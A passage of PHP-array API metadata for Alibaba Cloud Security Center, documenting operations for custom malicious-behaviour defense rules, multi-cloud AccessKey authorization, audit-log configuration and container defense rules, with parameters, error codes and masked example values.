['description' => 'The action type. Valid values:'."\n" ."\n" .'- **0**: allow'."\n" .'- **1**: block.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'ProcPath', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => '/root/1111/****', 'title' => ''], ], [ 'name' => 'Cmdline', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The command line.', 'type' => 'string', 'required' => false, 'example' => '/usr/sbin/s****'."\n", 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" ."\n" .'- **1**: process hash'."\n" .'- **2**: command line'."\n" .'- **3**: process network'."\n" .'- **4**: file read/write'."\n" .'- **5**: registry operation'."\n" .'- **6**: dynamic-link library loading'."\n" .'- **7**: file rename.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux'."\n" .'- **all**: all.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'IP', 'in' => 'query', 'schema' => ['description' => 'The IP address.', 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number. This parameter is deprecated.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'FilePath', 'in' => 'query', 'schema' => ['description' => 'The file path.', 'type' => 'string', 'required' => false, 'example' => '/etc/pam.d/su****', 'title' => ''], ], [ 'name' => 'RegistryKey', 'in' => 'query', 'schema' => ['description' => 'The registry key.', 'type' => 'string', 'required' => false, 'example' => 'HKEY_DYN_****', 'title' => ''], ], [ 'name' => 'RegistryContent', 'in' => 'query', 'schema' => ['description' => 'The registry value.', 'type' => 'string', 'required' => false, 'example' => 'SECOH-QAD****', 'title' => ''], ], [ 'name' => 'NewFilePath', 'in' => 'query', 'schema' => ['description' => 'The new file path for file rename.', 'type' => 'string', 'required' => false, 'example' => '/etc/pam****', 'title' => ''], ], [ 'name' => 'ParentProcPath', 'in' => 'query', 'schema' => ['description' => 'The parent process path.', 'type' => 'string', 'required' => false, 'example' => 'C:/Windows/System32/cmd****', 'title' => ''], ], [ 'name' => 'ParentCmdline', 'in' => 'query', 'schema' => ['description' => 'The parent process command line.', 'type' => 'string', 'required' => false, 'example' => '/usr/sbin/s****', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => '规则****', 'title' => ''], ], [ 'name' => 'PortStr', 'in' => 'query', 'schema' => ['description' => 'The port number. Valid values: 1 to 65535.', 'type' => 'string', 'required' => false, 'example' => '80', 'title' => ''], ], [ 'name' => 'Domain', 'in' => 'query', 'schema' => ['description' => 'The domain name.', 'type' => 'string', 'required' => false, 'example' => 'example.com', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '5cbb3c39-88ec-429a-be26-5d0f62cc****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'UserDefineRuleFilePathTooLong', 'errorMessage' => 'User define rule file path too long.', 'description' => ''], ['errorCode' => 'InvalidFilePath', 'errorMessage' => 'Invalid FilePath value.', 'description' => ''], ['errorCode' => 'InvalidPort', 'errorMessage' => 'Invalid PortStr value.', 'description' => ''], ['errorCode' => 'InvalidIP', 'errorMessage' => 'Invalid IP value.', 'description' => ''], ['errorCode' => 'UserDefineRuleCmdlineTooLong', 'errorMessage' => 'User define rule command line too long.', 'description' => ''], ['errorCode' => 'InvalidCmdline', 'errorMessage' => 'Command line is invalid.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleProcPath', 'errorMessage' => 'User define rule process path is invalid.', 'description' => ''], ['errorCode' => 'UserDefineRuleProcPathMustContainsLetter', 'errorMessage' => 'User define rule process path must contain letter.', 'description' => ''], ['errorCode' => 'InvalidProcPath', 'errorMessage' => 'Process path is invalid.', 'description' => ''], ['errorCode' => 'UserDefineRuleMd5TooMany', 'errorMessage' => 'Too many user define rule md5s.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleMd5List', 'errorMessage' => 'Invalid Md5List value.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleType', 'errorMessage' => 'Invalid Type value.', 'description' => ''], ['errorCode' => 'UserDefineRuleNameTooLong', 'errorMessage' => 'User define rule name too long.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleName', 'errorMessage' => 'Invalid Name value.', 'description' => ''], ['errorCode' => 'InvalidPlatform', 'errorMessage' => 'Invalid Platform value.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleActionType', 'errorMessage' => 'Invalid ActionType value.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a client custom rule', 'summary' => 'Modifies a custom rule for malicious behavior defense.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientUserDefineRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyClientUserDefineRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5cbb3c39-88ec-429a-be26-5d0f62cc****\\"\\n}","type":"json"}]', ], 'ModifyCloudVendorAccountAK' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92357', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'AuthIds', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the AccessKey pair.'."\n" .'>Call the [DescribeCloudVendorAccountAKList](~~DescribeCloudVendorAccountAKList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '2832', 'title' => ''], ], [ 'name' => 'SecretId', 'in' => 'query', 'schema' => ['description' => 'The AccessKey parameter ID. Valid values:'."\n" ."\n" .'1. If AkType is set to primary:'."\n" .'- **Tencent**: AccessKeyId of the primary account'."\n" .'- **HUAWEICLOUD**: AccessKeyId of the primary account'."\n" .'- **Azure**: ClientId'."\n" .'- **AWS**: AccessKeyId of the primary account'."\n" .'- **VOLCENGINE**: AccessKeyId of the primary account'."\n" ."\n" .'2. If AkType is set to sub:'."\n" .'- **Tencent**: AccessKeyId of the RAM user'."\n" .'- **HUAWEICLOUD**: AccessKeyId of the RAM user'."\n" .'- **Azure**: ClientId'."\n" .'- **AWS**: AccessKeyId of the RAM user'."\n" .'- **VOLCENGINE**: AccessKeyId of the RAM user'."\n" .'- **google**: private_key_id'."\n" ."\n" .'>If AkType is set to **primary**, this value is the SecretID of the primary account on the third-party cloud. If AkType is set to **sub**, this value is the Access Key ID of the RAM user on the third-party cloud. For **Azure**, no distinction is made, and this value is the **appId** of the authentication information. Google Cloud is accessed through a service account. AkType is set to sub by default, and this value is the private_key_id property value from the JSON-formatted service key file.', 'type' => 'string', 'required' => false, 'example' => 'S3D6c4O***', 'title' => ''], ], [ 'name' => 'SecretKey', 'in' => 'query', 'schema' => ['description' => 'The AccessKey parameter secret.'."\n" .'> If AkType is set to **primary**, this value is the Secret Access Key of the primary account on the third-party cloud. If AkType is set to **sub**, this value is the Secret Access Key of the RAM user on the third-party cloud. For **Azure**, no distinction is made, and this value is the **password** of the authentication information. Google Cloud is accessed through a service account. AkType is set to sub by default, and this value is the private_key property value from the JSON-formatted service key file.', 'type' => 'string', 'required' => false, 'example' => 'AE6SLd****', 'title' => ''], ], [ 'name' => 'Regions', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of regions used for AccessKey information verification.', 'type' => 'array', 'items' => ['description' => 'The region used for AccessKey information verification.'."\n" .'>This parameter is valid only when Vendor is set to AWS. Call the [ListCloudVendorRegions](~~ListCloudVendorRegions~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ap-south-1', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The usage status of the AccessKey pair. Valid values:'."\n" .'- **0**: enabled'."\n" .'- **1**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'TenantId', 'in' => 'query', 'schema' => ['description' => 'The tenant ID.'."\n" .'>This parameter is valid only when Vendor is set to Azure.', 'type' => 'string', 'required' => false, 'example' => '95304a97-339b-4de5-9a7d-cdbffaf****', 'title' => ''], ], [ 'name' => 'SubscriptionIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of subscription IDs.'."\n" .'> This parameter is no longer valid.', 'type' => 'array', 'items' => ['description' => 'The subscription ID.'."\n" .'> This parameter is no longer valid.', 'type' => 'string', 'required' => false, 'example' => '9b41e7ae-fcbf-4983-aa32-6fb2e*****', 'title' => ''], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'Domain', 'in' => 'query', 'schema' => ['description' => 'The domain of the connected account. Valid values:'."\n" .'- **china**: China'."\n" .'- **global**: global'."\n" .'- **europe**: Huawei Cloud Europe'."\n" ."\n" .'> This parameter is valid only when **Vendor** is set to **HUAWEICLOUD**, **Azure**, **AWS**, or **VOLCENGINE**, and is required.', 'type' => 'string', 'required' => false, 'example' => 'global', 'title' => ''], ], [ 'name' => 'AuthModules', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of module codes associated with the AccessKey pair. Valid values:'."\n" .'- **HOST**: host'."\n" .'- **CSPM**: cloud product configuration check'."\n" .'- **SIEM**: Cloud Threat Detection and Response (CTDR)'."\n" .'- **TRIAL**: log audit'."\n" .'> Call the [GetSupportedModules](~~GetSupportedModules~~) operation to obtain the supported modules.', 'type' => 'array', 'items' => ['description' => 'The module code associated with the AccessKey pair. Valid values:'."\n" .'- **HOST**: host'."\n" .'- **CSPM**: cloud product configuration check'."\n" .'- **SIEM**: Cloud Threat Detection and Response (CTDR)'."\n" .'- **TRIAL**: log audit'."\n" .'> Call the [GetSupportedModules](~~GetSupportedModules~~) operation to obtain the supported modules.', 'type' => 'string', 'required' => false, 'example' => 'HOST', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'VendorAuthAlias', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The name of the AccessKey account.'."\n" .'>Used to identify the account to which third-party host assets belong.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'ExtendInfo', 'in' => 'query', 'schema' => ['description' => 'The extended information.'."\n" ."\n" .'> Used to store extended information for different vendors.'."\n" .'>Google Cloud is accessed through a service account. ExtendInfo stores the JSON-formatted service key file, excluding the private_key_id and zprivate_key fields. The file contains the following fields: type, project_id, client_email, client_id, auth_uri, token_uri, auth_provider_x509_cert_url, client_x509_cert_url, and universe_domain.', 'type' => 'string', 'required' => false, 'example' => '{\\"product\\":\\"webFirewall\\",\\"remark\\":\\"remark\\"}', 'title' => ''], ], [ 'name' => 'CtdrCloudUserId', 'in' => 'query', 'schema' => ['description' => 'The account ID.'."\n" .'>The account ID of the connected cloud vendor. This parameter is required when the permission description includes Cloud Threat Detection and Response (CTDR).', 'type' => 'string', 'required' => false, 'example' => 'azure_demo_1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '6635CED5-4B20-5D2D-94EC-A1C8F9C****', 'title' => ''], 'Data' => [ 'description' => 'The authorization and authentication information that is added.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The usage status of the AccessKey pair. Valid values:'."\n" .'- **0**: enabled'."\n" .'- **1**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AuthId' => ['description' => 'The unique ID of the AccessKey pair.', 'type' => 'integer', 'format' => 'int64', 'example' => '2158', 'title' => ''], 'AkType' => ['description' => 'The type of the AccessKey account. Valid values:'."\n" ."\n" .'- **primary**: primary account'."\n" .'- **sub**: RAM user.', 'type' => 'string', 'example' => 'sub', 'title' => ''], 'SecretId' => ['description' => 'The AccessKey parameter ID.'."\n" .'> If AkType is set to **primary**, this value is the SecretID of the primary account on the third-party cloud. If AkType is set to **sub**, this value is the Access Key ID of the RAM user on the third-party cloud. For **Azure**, no distinction is made, and this value is the **appId** of the authentication information.', 'type' => 'string', 'example' => 'AE6SLd****', 'title' => ''], 'ServiceStatus' => ['description' => 'The availability status of the AccessKey pair. Valid values:'."\n" .'- **0**: in use'."\n" .'- **1**: abnormal'."\n" .'- **2**: validity verification in progress'."\n" .'- **3**: validity verification timed out.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The cloud asset vendor. Valid values:'."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **HUAWEICLOUD**: Huawei Cloud'."\n" .'- **Azure**: Azure'."\n" .'- **AWS**: AWS'."\n" .'- **VOLCENGINE**: Volcengine'."\n" .'- **google**: Google Cloud'."\n" .'- **CHAITIN**: Chaitin Tech'."\n" .'- **FORTINET**: Fortinet'."\n" .'- **THREATBOOK**: ThreatBook.', 'type' => 'string', 'example' => 'Tencent', 'title' => ''], 'Message' => ['description' => 'The exception information of the AccessKey pair.', 'type' => 'string', 'example' => 'The IAM user is forbidden in the currently selected region', 'title' => ''], 'AuthModules' => [ 'description' => 'The list of modules associated with the AccessKey pair.', 'type' => 'array', 'items' => [ 'description' => 'The information about the module associated with the authorization and authentication.', 'type' => 'object', 'properties' => [ 'ModuleDisp' => ['description' => 'The display name of the module.', 'type' => 'string', 'example' => 'Host Assets', 'title' => ''], 'ModuleStatement' => ['description' => 'The description of permissions associated with the module.', 'type' => 'string', 'example' => 'Read permission of the cloud server or virtual machine', 'title' => ''], 'Module' => ['description' => 'The module code. Valid values:'."\n" .'- **HOST**: host'."\n" .'- **CSPM**: cloud product configuration check'."\n" .'- **SIEM**: Cloud Threat Detection and Response (CTDR)'."\n" .'- **TRIAL**: log audit.', 'type' => 'string', 'example' => 'HOST', 'title' => ''], 'ModuleAssetType' => ['description' => 'The description of cloud assets associated with the module.', 'type' => 'string', 'example' => 'Cloud server or virtual machine', 'title' => ''], 'ModuleServiceStatus' => ['description' => 'The module status. Valid values:'."\n" .'- **0**: in use'."\n" .'- **1**: abnormal'."\n" .'- **2**: validity verification in progress'."\n" .'- **3**: validity verification timed out.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Message' => ['description' => 'The exception information of the module.', 'type' => 'string', 'example' => 'ak_domain_error', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VendorAuthAlias' => ['description' => 'The name of the AccessKey account.'."\n" .'>Used to identify the account to which third-party host assets belong.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'CtdrCloudUserId' => ['description' => 'The account ID.'."\n" .'>The account ID of the connected cloud vendor.', 'type' => 'string', 'example' => 'azure_demo_1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify multi-cloud asset authorization configuration', 'summary' => 'Modifies the authorization and authentication configuration of multi-cloud assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCloudVendorAccountAK'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyCloudVendorAccountAK', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6635CED5-4B20-5D2D-94EC-A1C8F9C****\\",\\n \\"Data\\": {\\n \\"Status\\": 0,\\n \\"AuthId\\": 2158,\\n \\"AkType\\": \\"sub\\",\\n \\"SecretId\\": \\"AE6SLd****\\",\\n \\"ServiceStatus\\": 0,\\n \\"Vendor\\": \\"Tencent\\",\\n \\"Message\\": \\"The IAM user is forbidden in the currently selected region\\",\\n \\"AuthModules\\": [\\n {\\n \\"ModuleDisp\\": \\"Host Assets\\",\\n \\"ModuleStatement\\": \\"Read permission of the cloud server or virtual machine\\",\\n \\"Module\\": \\"HOST\\",\\n \\"ModuleAssetType\\": \\"Cloud server or virtual machine\\",\\n \\"ModuleServiceStatus\\": 0,\\n \\"Message\\": \\"ak_domain_error\\"\\n }\\n ],\\n \\"VendorAuthAlias\\": \\"test\\",\\n \\"CtdrCloudUserId\\": \\"azure_demo_1\\"\\n }\\n}","type":"json"}]', ], 'ModifyCloudVendorTrialConfig' => [ 'summary' => 'Modify the Trail configuration information for the AK', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '201839', 'abilityTreeNodes' => ['FEATUREsasVQUB1H'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AuthId', 'in' => 'query', 'schema' => ['description' => 'The ID of the audit log configuration to be modified.'."\n" .'> The ID can be queried via [DescribeCloudVendorAccountAKList](~~DescribeCloudVendorAccountAKList~~).', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '23**', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor. Values:'."\n" ."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **AWS**: AWS', 'type' => 'string', 'required' => true, 'example' => 'Tencent', 'title' => ''], ], [ 'name' => 'AuthInfo', 'in' => 'query', 'schema' => ['description' => 'Enter the multi-cloud configuration information:'."\n" .'- AWS: parameters sqsQueueName, sqsRegion'."\n" .'- Tencent: parameters kafkaUserName, kafkaBootstrapServers, kafkaTopic', 'type' => 'string', 'required' => false, 'example' => '{\\"sqsRegion\\":\\"us-west-2\\",\\"sqsQueueName\\":\\"****\\"}'."\n", 'title' => ''], ], [ 'name' => 'DeleteTrail', 'in' => 'query', 'schema' => ['description' => 'Whether to delete this audit log configuration:'."\n" .'- true: Delete'."\n" .'- false: Do not delete', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Returned structure', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of this call request, a unique identifier generated by Alibaba Cloud for the request, which can be used to troubleshoot and pinpoint issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0D****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify the audit log configuration information for multi-cloud access', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCloudVendorTrialConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:modifyCloudVendorTrialConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0D****\\"\\n}","type":"json"}]', 'translator' => 'machine', ], 'ModifyClusterCnnfStatusUserConfirm' => [ 'summary' => 'Fixes the blocking status of clusters whose status is Normal to be confirmed.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '103078', 'abilityTreeNodes' => ['FEATUREsas5HPCI8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The cluster IDs.'."\n", 'type' => 'array', 'items' => ['description' => 'The cluster ID. You can call the [ListClusterInterceptionConfig](~~ListClusterInterceptionConfig~~) operation to query the IDs of cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cf55f3bd2bad747858c6a5f2101ad****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'UserConfirm', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to fix the blocking status of the cluster. Valid values:'."\n" ."\n" .'* true: yes'."\n" .'* false: no', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '4FFBEDBD-FA63-5213-9103-306519EE4857'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyClusterCnnfStatusUserConfirm', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClusterCnnfStatusUserConfirm'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyClusterCnnfStatusUserConfirm', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4FFBEDBD-FA63-5213-9103-306519EE4857\\"\\n}","type":"json"}]', ], 'ModifyConcernNecessity' => [ 'summary' => 'Sets the urgency levels of vulnerabilities that the user is concerned about.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92358', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ConcernNecessity', 'in' => 'query', 'schema' => ['description' => 'The list of vulnerability fix necessity levels.'."\n" ."\n" .'- asap: High'."\n" ."\n" .'- later: Medium'."\n" ."\n" .'- nntf: Low', 'type' => 'string', 'required' => false, 'example' => 'asap,nntf', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F059E190-A65B-5DF8-8709-2CC7791A5B65', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set the urgency levels of vulnerabilities that the user is concerned about', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyConcernNecessity'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyConcernNecessity', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F059E190-A65B-5DF8-8709-2CC7791A5B65\\"\\n}","type":"json"}]', ], 'ModifyContainerDefenseRule' => [ 'summary' => 'Modifies a rule for non-image program defense.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '162194', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['title' => 'id', 'description' => 'The ID of the rule.'."\n" ."\n" .'> You can call the [ListContainerDefenseRule](~~2590599~~) operation to query the IDs of rules.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123'], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => ['description' => 'The action specified in the rule. Valid values:'."\n" ."\n" .'- **1**: alert'."\n" ."\n" .'- **2**: block', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '1'], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => ['description' => 'The status of the rule. Valid values:'."\n" ."\n" .'- **1**: enabled'."\n" ."\n" .'- **0**: disabled', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '1'], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.', 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'text-001'], ], [ 'name' => 'Description', 'in' => 'query', 'schema' => ['description' => 'The description of the rule.', 'type' => 'string', 'title' => '', 'required' => false, 'example' => '防御规则。'], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of the rule. Valid values:'."\n" ."\n" .'- 1: system rule'."\n" ."\n" .'- 2: custom rule', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Whitelist', 'in' => 'query', 'style' => 'json', 'schema' => [ 'title' => '', 'description' => 'The whitelist.', 'type' => 'object', 'properties' => [ 'Hash' => [ 'description' => 'The hash values of the files that need to be added to the whitelist.'."\n" ."\n" .'> This parameter is not supported.', 'type' => 'array', 'items' => ['description' => 'The hash value of the file that needs to be added to the whitelist.'."\n" ."\n" .'> This parameter is not supported.', 'type' => 'string', 'deprecated' => true, 'required' => false, 'example' => '0', 'title' => ''], 'deprecated' => true, 'required' => false, 'title' => '', 'example' => '', ], 'Path' => [ 'description' => 'The paths to the files that need to be added to the whitelist.', 'type' => 'array', 'items' => ['description' => 'The path to the file that needs to be added to the whitelist.', 'type' => 'string', 'required' => false, 'example' => '/home/workspace/', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'Image' => [ 'description' => 'The images that need to be added to the whitelist.', 'type' => 'array', 'items' => ['description' => 'The image that needs to be added to the whitelist.', 'type' => 'string', 'required' => false, 'example' => 'repo:tag', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'example' => '', ], ], [ 'name' => 'Scope', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The effective scope of the rule.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the cluster on which the rule takes effect.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.', 'type' => 'string', 'required' => 